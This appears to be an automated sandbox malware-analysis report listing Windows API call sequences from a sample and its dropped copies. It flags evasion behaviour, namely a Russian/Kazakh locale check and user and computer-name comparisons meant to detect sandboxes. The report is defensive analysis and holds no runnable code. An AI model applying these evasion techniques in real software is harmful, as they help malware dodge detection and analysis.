Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to behave differently if execute on a Russian/Kazak computer
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 2_2_02C74920
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01414920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 5_2_01414920
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01384920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 6_2_01384920
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03214920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 10_2_03214920
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402C10
Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402C10
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02C77020
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02C90BE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02C92320
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,2_2_02C89860
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02C8B810
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02C911C0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,2_2_02C7C9F0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02C71180
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02C91150
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02C71670
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02C8FFE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02C8FDC0
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02C92590
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError,2_2_02C73510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_01431150
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_014311C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,5_2_0141C9F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_01411180
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,5_2_01429860
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_0142B810
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_01417020
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_01432320
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_01430BE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,5_2_01413510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_0142FDC0
